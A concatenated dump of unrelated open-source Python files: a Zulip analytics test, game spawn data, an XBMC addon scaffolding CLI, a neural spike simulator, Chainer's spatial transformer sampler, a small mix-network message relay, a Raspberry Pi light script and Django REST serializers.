self.assertTableState(RealmCount, ['value', 'subgroup', 'end_time'],
[[2, 'subgroup1', self.TIME_ZERO], [1, 'subgroup2', self.TIME_ZERO],
[1, 'subgroup1', self.TIME_LAST_HOUR]])
def test_increment(self):
# type: () -> None
stat = LoggingCountStat('test', RealmCount, CountStat.DAY)
self.current_property = 'test'
do_increment_logging_stat(self.default_realm, stat, None, self.TIME_ZERO, increment=-1)
self.assertTableState(RealmCount, ['value'], [[-1]])
do_increment_logging_stat(self.default_realm, stat, None, self.TIME_ZERO, increment=3)
self.assertTableState(RealmCount, ['value'], [[2]])
do_increment_logging_stat(self.default_realm, stat, None, self.TIME_ZERO)
self.assertTableState(RealmCount, ['value'], [[3]])
class TestLoggingCountStats(AnalyticsTestCase):
def test_aggregation(self):
# type: () -> None
stat = LoggingCountStat('realm test', RealmCount, CountStat.DAY)
do_increment_logging_stat(self.default_realm, stat, None, self.TIME_ZERO)
process_count_stat(stat, self.TIME_ZERO)
user = self.create_user()
stat = LoggingCountStat('user test', UserCount, CountStat.DAY)
do_increment_logging_stat(user, stat, None, self.TIME_ZERO)
process_count_stat(stat, self.TIME_ZERO)
stream = self.create_stream_with_recipient()[0]
stat = LoggingCountStat('stream test', StreamCount, CountStat.DAY)
do_increment_logging_stat(stream, stat, None, self.TIME_ZERO)
process_count_stat(stat, self.TIME_ZERO)
self.assertTableState(InstallationCount, ['property', 'value'],
[['realm test', 1], ['user test', 1], ['stream test', 1]])
self.assertTableState(RealmCount, ['property', 'value'],
[['realm test', 1], ['user test', 1], ['stream test', 1]])
self.assertTableState(UserCount, ['property', 'value'], [['user test', 1]])
self.assertTableState(StreamCount, ['property', 'value'], [['stream test', 1]])
def test_active_users_log_by_is_bot(self):
# type: () -> None
property = 'active_users_log:is_bot:day'
user = do_create_user('email', 'password', self.default_realm, 'full_name', 'short_name')
self.assertEqual(1, RealmCount.objects.filter(property=property, subgroup=False)
.aggregate(Sum('value'))['value__sum'])
do_deactivate_user(user)
self.assertEqual(0, RealmCount.objects.filter(property=property, subgroup=False)
.aggregate(Sum('value'))['value__sum'])
do_activate_user(user)
self.assertEqual(1, RealmCount.objects.filter(property=property, subgroup=False)
.aggregate(Sum('value'))['value__sum'])
do_deactivate_user(user)
self.assertEqual(0, RealmCount.objects.filter(property=property, subgroup=False)
.aggregate(Sum('value'))['value__sum'])
do_reactivate_user(user)
self.assertEqual(1, RealmCount.objects.filter(property=property, subgroup=False)
.aggregate(Sum('value'))['value__sum'])
| apache-2.0 | 4,257,407,679,303,316,500 | 50.127869 | 125 | 0.613441 | false |
LaoZhongGu/kbengine | demo/res/scripts/data/d_spaces_spawns.py | 3 | 2636 | # -*- coding: utf-8 -*-
datas={
1: [
],
2: [
(1001, (-102.9299, 191.0, -150.922),(0.0,0.0,0.0), 1),
(1002, (-105.0, 191.0, -150.922),(0.0,0.0,0.0), 1),
(1003, (-132.9299, 191.0, -150.922),(0.0,0.0,0.0), 1),
(1003, (-137.833725, 170.639648, -202.246201),(0.0,0.0,0.0), 1),
(1003, (-146.968063, 161.339844, -231.600098),(0.0,0.0,0.0), 1),
(1003, (-94.462944, 180.093750, -195.883881),(0.0,0.0,0.0), 1),
(1003, (-103.794640, 177.567383, -220.648834),(0.0,0.0,0.0), 1),
(1003, (-83.443954, 178.699219, -239.645569),(0.0,0.0,0.0), 1),
(1003, (-72.320412, 181.892578, -219.838470),(0.0,0.0,0.0), 1),
(1004, (-69.049957, 179.322266, -175.957031),(0.0,0.0,0.0), 1),
(1004, (-60.296272, 181.892578, -220.473770),(0.0,0.0,0.0), 1),
(1004, (-44.794971, 184.611328, -200.343048),(0.0,0.0,0.0), 1),
(1004, (-41.807720, 183.460938, -160.731979),(0.0,0.0,0.0), 1),
(1004, (-61.230453, 181.336914, -144.657440),(0.0,0.0,0.0), 1),
(1004, (-71.636917, 181.903320, -140.565033),(0.0,0.0,0.0), 1),
(1004, (-73.323441, 180.928711, -160.713318),(0.0,0.0,0.0), 1),
(1004, (-53.436718, 183.460938, -125.980476),(0.0,0.0,0.0), 1),
(1004, (-64.340378, 186.237305, -121.070831),(0.0,0.0,0.0), 1),
],
3: [
(1001, (-102.9299, 1.5, -150.922),(0.0,0.0,0.0), 1),
(1002, (-105.0, 1.5, -150.922),(0.0,0.0,0.0), 1),
(1003, (-132.9299, 1.5, -150.922),(0.0,0.0,0.0), 1),
(1003, (-137.833725, 1.5, -202.246201),(0.0,0.0,0.0), 1),
(1003, (-146.968063, 1.5, -231.600098),(0.0,0.0,0.0), 1),
(1003, (-94.462944, 1.5, -195.883881),(0.0,0.0,0.0), 1),
(1003, (-103.794640, 1.5, -220.648834),(0.0,0.0,0.0), 1),
(1003, (-83.443954, 1.5, -239.645569),(0.0,0.0,0.0), 1),
(1003, (-72.320412, 1.5, -219.838470),(0.0,0.0,0.0), 1),
(1004, (-69.049957, 1.5, -175.957031),(0.0,0.0,0.0), 1),
(1004, (-60.296272, 1.5, -220.473770),(0.0,0.0,0.0), 1),
(1004, (-44.794971, 1.5, -200.343048),(0.0,0.0,0.0), 1),
(1004, (-41.807720, 1.5, -160.731979),(0.0,0.0,0.0), 1),
(1004, (-61.230453, 1.5, -144.657440),(0.0,0.0,0.0), 1),
(1004, (-71.636917, 1.5, -140.565033),(0.0,0.0,0.0), 1),
(1004, (-73.323441, 1.5, -160.713318),(0.0,0.0,0.0), 1),
(1004, (-53.436718, 1.5, -125.980476),(0.0,0.0,0.0), 1),
(1004, (-64.340378, 1.5, -121.070831),(0.0,0.0,0.0), 1),
(40001001, (-34.340378, 1.5, -121.070831),(0.0,0.0,0.0), 1),
(40001003, (-20.340378, 1.5, -150.070831),(0.0,0.0,0.0), 1),
],
4: [
(40001002, (10, 1.5, 0),(0.0,0.0,0.0), 1),
],
5: [
(1001, (-102.9299, 1.5, -150.922),(0.0,0.0,0.0), 1),
(1002, (-105.0, 1.5, -150.922),(0.0,0.0,0.0), 1),
(40001002, (-34.340378, 1.5, -121.070831),(0.0,0.0,0.0), 1),
]
}
| lgpl-3.0 | 6,214,054,206,730,106,000 | 46.071429 | 66 | 0.515175 | false |
wndias/bc.repository | plugin.video.kmediatorrent/resources/site-packages/xbmcswift2/cli/create.py | 20 | 5636 | '''
xbmcswift2.cli.create
---------------------
This module contains the code to initialize a new XBMC addon project.
:copyright: (c) 2012 by Jonathan Beluch
:license: GPLv3, see LICENSE for more details.
'''
import os
import string
import readline
from os import getcwd
from xml.sax import saxutils
from optparse import OptionParser
from shutil import copytree, ignore_patterns
from getpass import getpass
class CreateCommand(object):
'''A CLI command to initialize a new XBMC addon project.'''
command = 'create'
usage = '%prog create'
@staticmethod
def run(opts, args):
'''Required run function for the 'create' CLI command.'''
create_new_project()
# Path to skeleton file templates dir
SKEL = os.path.join(os.path.dirname(__file__), 'data')
def error_msg(msg):
'''A decorator that sets the error_message attribute of the decorated
function to the provided value.
'''
def decorator(func):
'''Sets the error_message attribute on the provided function'''
func.error_message = msg
return func
return decorator
def parse_cli():
'''Currently only one positional arg, create.'''
parser = OptionParser()
return parser.parse_args()
@error_msg('** Value must be non-blank.')
def validate_nonblank(value):
'''A callable that retunrs the value passed'''
return value
@error_msg('** Value must contain only letters or underscores.')
def validate_pluginid(value):
'''Returns True if the provided value is a valid pluglin id'''
valid = string.ascii_letters + string.digits + '.'
return all(c in valid for c in value)
@error_msg('** The provided path must be an existing folder.')
def validate_isfolder(value):
'''Returns true if the provided path is an existing directory'''
return os.path.isdir(value)
def get_valid_value(prompt, validator, default=None):
'''Displays the provided prompt and gets input from the user. This behavior
loops indefinitely until the provided validator returns True for the user
input. If a default value is provided, it will be used only if the user
hits Enter and does not provide a value.
If the validator callable has an error_message attribute, it will be
displayed for an invalid value, otherwise a generic message is used.
'''
ans = get_value(prompt, default)
while not validator(ans):
try:
print validator.error_message
except AttributeError:
print 'Invalid value.'
ans = get_value(prompt, default)
return ans
def get_value(prompt, default=None, hidden=False):
'''Displays the provided prompt and returns the input from the user. If the
user hits Enter and there is a default value provided, the default is
returned.
'''
_prompt = '%s : ' % prompt
if default:
_prompt = '%s [%s]: ' % (prompt, default)
if hidden:
ans = getpass(_prompt)
else:
ans = raw_input(_prompt)
# If user hit Enter and there is a default value
if not ans and default:
ans = default
return ans
def update_file(filename, items):
'''Edits the given file in place, replacing any instances of {key} with the
appropriate value from the provided items dict. If the given filename ends
with ".xml" values will be quoted and escaped for XML.
'''
# TODO: Implement something in the templates to denote whether the value
# being replaced is an XML attribute or a value. Perhaps move to dyanmic
# XML tree building rather than string replacement.
should_escape = filename.endswith('addon.xml')
with open(filename, 'r') as inp:
text = inp.read()
for key, val in items.items():
if should_escape:
val = saxutils.quoteattr(val)
text = text.replace('{%s}' % key, val)
output = text
with open(filename, 'w') as out:
out.write(output)
def create_new_project():
'''Creates a new XBMC Addon directory based on user input'''
readline.parse_and_bind('tab: complete')
print \
'''
xbmcswift2 - A micro-framework for creating XBMC plugins.
[email protected]
--
'''
print 'I\'m going to ask you a few questions to get this project' \
' started.'
opts = {}
# Plugin Name
opts['plugin_name'] = get_valid_value(
'What is your plugin name?',
validate_nonblank
)
# Plugin ID
opts['plugin_id'] = get_valid_value(
'Enter your plugin id.',
validate_pluginid,
'plugin.video.%s' % (opts['plugin_name'].lower().replace(' ', ''))
)
# Parent Directory
opts['parent_dir'] = get_valid_value(
'Enter parent folder (where to create project)',
validate_isfolder,
getcwd()
)
opts['plugin_dir'] = os.path.join(opts['parent_dir'], opts['plugin_id'])
assert not os.path.isdir(opts['plugin_dir']), \
'A folder named %s already exists in %s.' % (opts['plugin_id'],
opts['parent_dir'])
# Provider
opts['provider_name'] = get_valid_value(
'Enter provider name',
validate_nonblank,
)
# Create the project folder by copying over skel
copytree(SKEL, opts['plugin_dir'], ignore=ignore_patterns('*.pyc'))
# Walk through all the new files and fill in with out options
for root, dirs, files in os.walk(opts['plugin_dir']):
for filename in files:
update_file(os.path.join(root, filename), opts)
print 'Projects successfully created in %s.' % opts['plugin_dir']
print 'Done.'
| gpl-2.0 | -3,313,580,659,413,640,700 | 28.820106 | 79 | 0.642832 | false |
noashin/kinetic_ising_model_neurons | spikes_activity_generator.py | 1 | 3550 | import numpy as np
from scipy import stats
from scipy.special import expit
from scipy.stats import multivariate_normal
def exp_cosh(H):
beta = 1.0
return 0.5 * np.exp(beta * H)/np.cosh(beta * H)
def gaussian(H):
#import ipdb; ipdb.set_trace()
a = 1
cov = np.diag(np.repeat(a, H.shape[1]))
return np.random.multivariate_normal(H[0], cov)
def kinetic_ising_model(S, J, energy_function):
""" Returns probabilities of S[t+1,n] being one.
:param S: numpy.ndarray (T,N)
Binary data where an entry is either 1 ('spike') or -1 ('silence').
:param J: numpy.ndarray (N, N)
Coupling matrix
:return: numpy.ndarray (T,N)
Probabilities that at time point t+1 neuron n fires
"""
# compute fields
H = compute_fields(S, J)
# If a string was passed as the energy function use the function that is mapped to it
string_to_func = {'exp_cosh': exp_cosh, 'gaussian': gaussian, 'logistic': expit}
if energy_function in string_to_func.keys():
energy_function = string_to_func[energy_function]
# compute probabilities
p = energy_function(H)
# return
return p
def compute_fields(S, J):
""" Computes the fields for given data and couplings
:param S: numpy.ndarray (T,N)
Binary data where an entry is either 1 ('spike') or -1 ('silence').
:param J: numpy.ndarray (N, N)
Coupling matrix.
:return: numpy.ndarray (T,N)
Fields at time point t+1 on neuron n
"""
# compute
H = np.dot(S, J)
return H
def spike_and_slab(ro, N, bias, v_s=1.0, bias_mean=0):
''' This function generate spike and priors
:param ro: sparsity
:param N: number of neurons
:param bias: 1 if bias is included in the model, 0 other wise
:return:
'''
gamma = stats.bernoulli.rvs(p=ro, size=(N + bias, N))
normal_dist = np.random.normal(0.0, v_s, (N + bias, N))
if bias:
gamma[N, :] = 1
normal_dist[N, :] = np.random.normal(bias_mean, v_s, N)
return gamma * normal_dist
def generate_spikes(N, T, S0, J, energy_function, bias, no_spike=-1):
""" Generates spike data according to kinetic Ising model
:param J: numpy.ndarray (N, N)
Coupling matrix.
:param T: int
Length of trajectory that is generated.
:param S0: numpy.ndarray (N)
Initial pattern that is sampling started from.
:param bias: 1 if bias is included in the model. 0 other wise.
:param no_spike: what number should represent 'no_spike'. Default is -1.
:return: numpy.ndarray (T, N)
Binary data where an entry is either 1 ('spike') or -1 ('silence'). First row is only ones for external fields.
"""
# Initialize array for data
S = np.empty([T, N + bias])
# Set initial spike pattern
S[0] = S0 if no_spike == -1 else np.zeros(N + bias)
# Last column in the activity matrix is of the bias and should be 1 at all times
if bias:
S[:, N] = 1
# Generate random numbers
X = np.random.rand(T - 1, N)
#X = np.random.normal(size=(T-1, N))
# Iterate through all time points
for i in range(1, T):
# Compute probabilities of neuron firing
p = kinetic_ising_model(np.array([S[i - 1]]), J, energy_function)
if energy_function == 'gaussian':
S[i, :N] = p
else:
# Check if spike or not
if no_spike == -1:
S[i, :N] = 2 * (X[i - 1] < p) - 1
else:
S[i, :N] = 2 * (X[i - 1] < p) / 2.0
return S
| mit | -7,903,146,007,753,143,000 | 28.583333 | 119 | 0.599718 | false |
geopython/QGIS | python/PyQt/PyQt5/QtSvg.py | 17 | 1129 | # -*- coding: utf-8 -*-
"""
***************************************************************************
QtSvg.py
---------------------
Date : March 2016
Copyright : (C) 2016 by Juergen E. Fischer
Email : jef at norbit dot de
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Juergen E. Fischer'
__date__ = 'March 2016'
__copyright__ = '(C) 2016, Juergen E. Fischer'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from PyQt5.QtSvg import *
| gpl-2.0 | -65,583,323,552,826,400 | 42.423077 | 75 | 0.374668 | false |
rezoo/chainer | chainer/functions/array/spatial_transformer_sampler.py | 3 | 11318 | import numpy
import chainer
from chainer.backends import cuda
from chainer import function
from chainer.utils import argument
from chainer.utils import type_check
if cuda.cudnn_enabled:
cudnn = cuda.cudnn
libcudnn = cuda.cuda.cudnn
_sampler_type = libcudnn.CUDNN_SAMPLER_BILINEAR
class SpatialTransformerSampler(function.Function):
def check_type_forward(self, in_types):
n_in = in_types.size()
type_check.expect(2 == n_in)
x_type = in_types[0]
grid_type = in_types[1]
type_check.expect(
x_type.dtype.char == 'f',
grid_type.dtype.char == 'f',
x_type.ndim == 4,
grid_type.ndim == 4,
grid_type.shape[1] == 2,
x_type.shape[0] == grid_type.shape[0],
)
def forward_cpu(self, inputs):
return self._forward(inputs)
def forward_gpu(self, inputs):
if not chainer.should_use_cudnn('>=auto', 5000):
return self._forward(inputs)
x, grid = inputs
out_shape = x.shape[:2] + grid.shape[2:]
y = cuda.cupy.empty(out_shape, dtype=x.dtype)
shape = numpy.array(out_shape, dtype=numpy.int32)
x = cuda.cupy.ascontiguousarray(x)
grid_t = cuda.cupy.transpose(grid, (0, 2, 3, 1))
grid_t = cuda.cupy.ascontiguousarray(grid_t)
handle = cudnn.get_handle()
x_desc = cudnn.create_tensor_descriptor(x)
y_desc = cudnn.create_tensor_descriptor(y)
self.st_desc =\
cuda.cupy.cudnn.create_spatial_transformer_descriptor(
_sampler_type, grid.dtype, len(shape), shape.ctypes.data)
one = numpy.array(1, dtype=x.dtype).ctypes
zero = numpy.array(0, dtype=x.dtype).ctypes
libcudnn.spatialTfSamplerForward(
handle, self.st_desc.value, one.data,
x_desc.value, x.data.ptr, grid_t.data.ptr, zero.data,
y_desc.value, y.data.ptr)
return y,
def _forward(self, inputs):
x, grid = inputs
xp = cuda.get_array_module(x)
B, C, H, W = x.shape
_, _, out_H, out_W = grid.shape
grid = grid.reshape(grid.shape[:2] + (-1,))
u = grid[:, 0]
v = grid[:, 1]
# Pad the image so that pixels locating outside of the original
# image's size can be sampled.
x_pad = xp.pad(x, ((0, 0), (0, 0), (1, 1), (1, 1)), mode='constant')
# Rescale coordinates from [-1, 1] to [0, width or height - 1],
# and adjust them to the padded image.
u = (u + 1) * (W - 1) / 2 + 1
v = (v + 1) * (H - 1) / 2 + 1
u_clipped = u.clip(0, W + 1)
v_clipped = v.clip(0, H + 1)
# indices of the 2x2 pixel neighborhood surrounding the coordinates
u0 = xp.floor(u_clipped).astype(numpy.int32)
u0 = u0.clip(0, W)
u1 = u0 + 1
v0 = xp.floor(v_clipped).astype(numpy.int32)
v0 = v0.clip(0, H)
v1 = v0 + 1
# weights
w1 = (u1 - u_clipped) * (v1 - v_clipped)
w2 = (u_clipped - u0) * (v1 - v_clipped)
w3 = (u1 - u_clipped) * (v_clipped - v0)
w4 = (u_clipped - u0) * (v_clipped - v0)
w1 = w1.astype(x_pad.dtype)
w2 = w2.astype(x_pad.dtype)
w3 = w3.astype(x_pad.dtype)
w4 = w4.astype(x_pad.dtype)
x_indexed_1 = xp.concatenate([xp.expand_dims(
x_pad[b, :, v0[b], u0[b]], axis=0) for b in range(B)], axis=0)
x_indexed_2 = xp.concatenate([xp.expand_dims(
x_pad[b, :, v0[b], u1[b]], axis=0) for b in range(B)], axis=0)
x_indexed_3 = xp.concatenate([xp.expand_dims(
x_pad[b, :, v1[b], u0[b]], axis=0) for b in range(B)], axis=0)
x_indexed_4 = xp.concatenate([xp.expand_dims(
x_pad[b, :, v1[b], u1[b]], axis=0) for b in range(B)], axis=0)
y = w1[:, :, None] * x_indexed_1
y += w2[:, :, None] * x_indexed_2
y += w3[:, :, None] * x_indexed_3
y += w4[:, :, None] * x_indexed_4
y = y.reshape(B, out_H, out_W, C).transpose(0, 3, 1, 2)
return y,
def backward_cpu(self, inputs, grad_outputs):
return self._backward(inputs, grad_outputs)
def backward_gpu(self, inputs, grad_outputs):
if not chainer.should_use_cudnn('>=auto', 5000):
return self._backward(inputs, grad_outputs)
x, grid = inputs
gy, = grad_outputs
grid_t = cuda.cupy.transpose(grid, (0, 2, 3, 1))
grid_t = cuda.cupy.ascontiguousarray(grid_t)
x = cuda.cupy.ascontiguousarray(x)
gy = cuda.cupy.ascontiguousarray(gy)
gx = cuda.cupy.empty_like(x)
ggrid_t = cuda.cupy.empty_like(grid_t)
handle = cudnn.get_handle()
x_desc = cudnn.create_tensor_descriptor(x)
dx_desc = cudnn.create_tensor_descriptor(gx)
dy_desc = cudnn.create_tensor_descriptor(gy)
one = numpy.array(1, dtype=x.dtype).ctypes
zero = numpy.array(0, dtype=x.dtype).ctypes
libcudnn.spatialTfSamplerBackward(
handle, self.st_desc.value,
one.data,
x_desc.value, x.data.ptr,
zero.data,
dx_desc.value, gx.data.ptr,
one.data,
dy_desc.value, gy.data.ptr,
grid_t.data.ptr, zero.data, ggrid_t.data.ptr)
ggrid = cuda.cupy.transpose(ggrid_t, axes=(0, 3, 1, 2))
return gx, ggrid
def _backward(self, inputs, grad_outputs):
x, grid = inputs
xp = cuda.get_array_module(x)
gy, = grad_outputs
B, C, H, W = x.shape
_, _, out_H, out_W = grid.shape
grid = grid.reshape(grid.shape[:2] + (-1,))
u = grid[:, 0]
v = grid[:, 1]
# Pad the image so that points locating outside of the original
# image's size can be sampled.
x_pad = xp.pad(x, ((0, 0), (0, 0), (1, 1), (1, 1)), mode='constant')
# Rescale coordinates from [-1, 1] to [0, width or height - 1],
# and adjust them to the padded image.
u = (u + 1) * (W - 1) / 2 + 1
v = (v + 1) * (H - 1) / 2 + 1
u_clipped = u.clip(0, W + 1)
v_clipped = v.clip(0, H + 1)
# indices of the 2x2 pixel neighborhood surrounding the coordinates
u0 = xp.floor(u_clipped).astype(numpy.int32)
u0 = u0.clip(0, W)
u1 = u0 + 1
v0 = xp.floor(v_clipped).astype(numpy.int32)
v0 = v0.clip(0, H)
v1 = v0 + 1
# weights
wu0 = u_clipped - u0
wu1 = u1 - u_clipped
wv0 = v_clipped - v0
wv1 = v1 - v_clipped
wu0 = wu0.astype(gy.dtype)
wu1 = wu1.astype(gy.dtype)
wv0 = wv0.astype(gy.dtype)
wv1 = wv1.astype(gy.dtype)
# --- gu, gv
x_indexed_1 = xp.concatenate([xp.expand_dims(
x_pad[b, :, v0[b], u0[b]], axis=0) for b in range(B)], axis=0)
x_indexed_2 = xp.concatenate([xp.expand_dims(
x_pad[b, :, v0[b], u1[b]], axis=0) for b in range(B)], axis=0)
x_indexed_3 = xp.concatenate([xp.expand_dims(
x_pad[b, :, v1[b], u0[b]], axis=0) for b in range(B)], axis=0)
x_indexed_4 = xp.concatenate([xp.expand_dims(
x_pad[b, :, v1[b], u1[b]], axis=0) for b in range(B)], axis=0)
gu = -wv1[:, :, None] * x_indexed_1
gu += wv1[:, :, None] * x_indexed_2
gu -= wv0[:, :, None] * x_indexed_3
gu += wv0[:, :, None] * x_indexed_4
gv = -wu1[:, :, None] * x_indexed_1
gv -= wu0[:, :, None] * x_indexed_2
gv += wu1[:, :, None] * x_indexed_3
gv += wu0[:, :, None] * x_indexed_4
gu = gu.reshape(B, out_H, out_W, C).transpose(0, 3, 1, 2)
gv = gv.reshape(B, out_H, out_W, C).transpose(0, 3, 1, 2)
gu *= gy
gv *= gy
gu = xp.sum(gu, axis=1)
gv = xp.sum(gv, axis=1)
# Offsets scaling of the coordinates and clip gradients.
u_reshaped = u.reshape(gu.shape)
v_reshaped = v.reshape(gv.shape)
gu = gu / 2. * (W - 1) * (u_reshaped > 0) * (u_reshaped < (W + 1))
gv = gv / 2. * (H - 1) * (v_reshaped > 0) * (v_reshaped < (H + 1))
ggrid = xp.concatenate((gu[:, None], gv[:, None]), axis=1)
# --- gx
if xp is numpy:
scatter_add = numpy.add.at
else:
scatter_add = cuda.cupyx.scatter_add
gx = xp.zeros_like(x_pad)
gy = gy.reshape(B, C, -1)
for b in range(B):
scatter_add(gx[b], (slice(None), v0[b], u0[b]),
gy[b] * wu1[b] * wv1[b])
scatter_add(gx[b], (slice(None), v0[b], u1[b]),
gy[b] * wu0[b] * wv1[b])
scatter_add(gx[b], (slice(None), v1[b], u0[b]),
gy[b] * wu1[b] * wv0[b])
scatter_add(gx[b], (slice(None), v1[b], u1[b]),
gy[b] * wu0[b] * wv0[b])
gx = gx[:, :, 1:-1, 1:-1]
return gx, ggrid
def spatial_transformer_sampler(x, grid, **kwargs):
"""2D Spatial Transformer sampler.
This is a differentiable image sampler. With a set of sampling points
``grid`` and an input feature map ``x``, this produces a sampled output
feature map.
This function currently only supports bilinear interpolation as a sampling
kernel.
When coordinates in ``grid`` is outside range :math:`[-1, 1]`, values are
sampled from a zero padded input image.
Notatition: here is a notation for dimensionalities.
- :math:`n` is the batch size.
- :math:`c_I` is the number of the input channels.
- :math:`h` and :math:`w` are the height and width of the input image,
respectively.
- :math:`h_O` and :math:`w_O` are the height and width of the output
image.
See detail in the following paper: `Spatial Transformer Networks \
<https://arxiv.org/abs/1506.02025>`_.
.. note::
cuDNN supports SpatialTransformerSampler from version 5.0.0.
Args:
x (~chainer.Variable): Input variable of shape :math:`(n, c_I, h, w)`.
grid (~chainer.Variable): Coordinate variable of shape
:math:`(n, 2, h_O, w_O)`. Each coordinate defines the spatial
location in the input where a sampling kernel is applied to get
the value at a particular pixel in the output.
``grid[idx, :, i, j]`` corresponds to the coordinate that is used
to sample the values for an output pixel at location
:math:`(i, j)`.
In the second dimension, the first coordinate corresponds to the
location along the horizontal axis, and the second coordinate
corresponds to the location along the vertical axis.
The coordinate :math:`(-1, -1)` corresponds to the upper-left
corner of the input image.
Returns:
~chainer.Variable: Output feature map of shape \
:math:`(n, c_I, h_O, w_O)`.
"""
if kwargs:
argument.check_unexpected_kwargs(
kwargs, use_cudnn="The argument \"use_cudnn\" is not "
"supported anymore. "
"Use chainer.using_config('use_cudnn', value) "
"context where value can be `always`, `never`, or `auto`.")
argument.assert_kwargs_empty(kwargs)
return SpatialTransformerSampler()(x, grid)
| mit | -4,569,858,674,480,813,000 | 35.509677 | 79 | 0.54029 | false |
sigttou/SMMpy | src/server.py | 1 | 4225 | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
__author__ = "David Bidner, Rene Höbling and Alexander Wachter"
__license__ = "BSD 2-Clause"
__version__ = "1.0.0"
__status__ = "Released"
# Provides a more or less complex structure for the SMM Network server
import rsa
import os.path
import time
import stomp
import json
import base64
import random
import sys
from SimpleAES import SimpleAES
from settings import STOMP_PORT, MAX_QUEUE_SIZE, QUEUE, KEY_PATH
class MixListener(object):
def __init__(self, privkey=None):
if not privkey:
print("No PrivateKey")
sys.exit
self.privkey = privkey
self.to_send = []
def on_error(self, headers, message):
print('received an error %s' % message)
def on_message(self, headers, message):
message = json.loads(message)
# Tracker things:
if(message.get('TYPE') == "INFO"):
data = message['DATA']
for entry in data:
with open(KEY_PATH + entry, 'w') as storage:
storage.write(data[entry])
return
if(message.get('TYPE') == "REQ"):
info = {}
response = {}
response['TYPE'] = "INFO"
for entry in os.listdir(KEY_PATH):
with open(KEY_PATH + entry, 'r') as content:
info[entry] = content.read()
response['DATA'] = info
response = json.dumps(response)
address = message['FROM'].split(":")[0]
port = STOMP_PORT
if len(message['FROM'].split(":")) == 2:
port = message['FROM'].split(":")[1]
try:
conn = stomp.StompConnection10([(address, port)])
conn.start()
conn.connect()
conn.send(body=response, destination=QUEUE)
conn.disconnect
except:
print("REMOTE HOST NOT AVAILABLE")
return
# Any other message
crypted_key = base64.b64decode(message['KEY'])
aes_key = rsa.decrypt(crypted_key, self.privkey)
aes = SimpleAES(aes_key)
data = aes.decrypt(base64.b64decode(message['DATA']))
if message['TO'] == '':
print(message['FROM'] + ': ' + data)
else:
print('Relaying message to: %s' % message['TO'])
self.to_send.append((data, message['TO']))
if len(self.to_send) > MAX_QUEUE_SIZE:
random.shuffle(self.to_send)
for data in self.to_send:
address = data[1].split(":")[0]
port = STOMP_PORT
if len(data[1].split(":")) == 2:
port = data[1].split(":")[1]
try:
conn = stomp.StompConnection10([(address, port)])
conn.start()
conn.connect()
conn.send(body=data[0], destination=QUEUE)
conn.disconnect
except:
print("REMOTE HOST NOT AVAILABLE")
self.to_send = []
def main():
# Do we have our OWN Keys?
if not (os.path.isfile('./privkey.pem') and os.path.isfile('./pubkey.pem')):
(pubkey, privkey) = rsa.newkeys(512)
with open("privkey.pem", 'w') as keyfile:
keyfile.write(privkey.save_pkcs1())
with open("pubkey.pem", 'w') as keyfile:
keyfile.write(pubkey.save_pkcs1())
else:
with open("privkey.pem") as keyfile:
keydata = keyfile.read()
privkey = rsa.PrivateKey.load_pkcs1(keydata)
with open("pubkey.pem") as keyfile:
keydata = keyfile.read()
pubkey = rsa.PublicKey.load_pkcs1(keydata)
# After this, we can use pubkey and privkey as our keypair for encryption
# Connect to stomp and fetch messages
conn = stomp.StompConnection10()
conn.set_listener('', MixListener(privkey))
conn.start()
conn.connect()
conn.subscribe(destination=QUEUE, id=1, ack='auto')
# Yes we do this :-)
while (True):
time.sleep(10)
if __name__ == "__main__":
main()
| bsd-2-clause | 7,359,604,263,949,605,000 | 31 | 80 | 0.523674 | false |
allena29/pi-learning | 02-operation-nee-naw/script.py | 1 | 1062 | #!/usr/bin/python
import sys
import RPi.GPIO as GPIO
import time
GPIO.setmode(GPIO.BOARD)
# Setup Stuff
sys.stderr.write('\033[1;31mnee\033[1;34mnaw script')
GPIO.setup(39, GPIO.OUT)
GPIO.setup(40, GPIO.OUT)
# HOW
def turn_a_light_on_or_off(light, on):
if light == 'red':
gpio_pin_number = 27
sound = '\033[1;31mnee'
elif light == 'blue':
gpio_pin_number = 22
sound = '\033[1;34mnawitsthepolice'
else:
raise ValueError('no such light colour plugged in')
sys.stderr.write('%s ' % (sound))
GPIO.output(gpio_pin_number, on)
# WHAT
#
# The scenario we are trying to acheive
# (i.e. police chase, granny being chased by lambourghini)
#
try:
while 1:
turn_a_light_on_or_off('red', True)
turn_a_light_on_or_off('blue', False)
time.sleep(0.125)
turn_a_light_on_or_off('red', False)
turn_a_light_on_or_off('blue', True)
time.sleep(0.125)
except KeyboardInterrupt:
GPIO.output(22, 0)
GPIO.output(27, 0)
# CLEANUP
sys.stderr.write('\n')
| gpl-3.0 | -7,835,198,423,294,629,000 | 18.309091 | 59 | 0.617702 | false |
rishatsharafiev/crm | project/api/serializers.py | 1 | 8981 | # -*- coding: utf-8 -*-
from rest_framework import serializers
from rest_framework import exceptions
from rest_framework.validators import ValidationError, UniqueValidator
from django.contrib.auth.models import User
from .models import (
Employee,
Subdivision,
Project,
Task,
Comment,
# TaskPicture,
# CommentPicture
)
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = User
exclude = ('is_staff','is_superuser','is_active','groups','user_permissions')
extra_kwargs = {
'password': {
'required': False,
'write_only': True
},
'username': {
'validators': []
}
}
def restore_object(self, attrs, instance=None):
user = super(UserSerializer, self).restore_object(attrs, instance)
user.set_password(attrs['password'])
return user
class EmployeeChildField(serializers.RelatedField):
def to_representation(self, value):
return value.title
class EmployeeSerializer(serializers.ModelSerializer):
link = serializers.HyperlinkedIdentityField(view_name='employee-detail')
user = UserSerializer()
subdivision_name = EmployeeChildField(
source='subdivision', read_only=True, required=False
)
put_method_allowed = serializers.SerializerMethodField()
delete_method_allowed = serializers.SerializerMethodField()
def get_put_method_allowed(self, obj):
user = self.context['request'].user
authenticated = user.is_authenticated()
staff = authenticated and user.is_staff
owner = authenticated and (obj.user == user)
return staff or owner
def get_delete_method_allowed(self, obj):
user = self.context['request'].user
authenticated = user.is_authenticated()
staff = authenticated and user.is_staff
return staff
class Meta:
model = Employee
fields = (
"id",
'user',
'link',
'subdivision',
'subdivision_name',
'put_method_allowed',
'delete_method_allowed'
)
related_obj_name = 'user'
def create(self, validated_data):
user_data = validated_data.pop('user')
user = User.objects.create(**user_data)
user.set_password( user_data.get('password') )
user.save()
employee = Employee.objects.create(user=user, **validated_data)
return employee
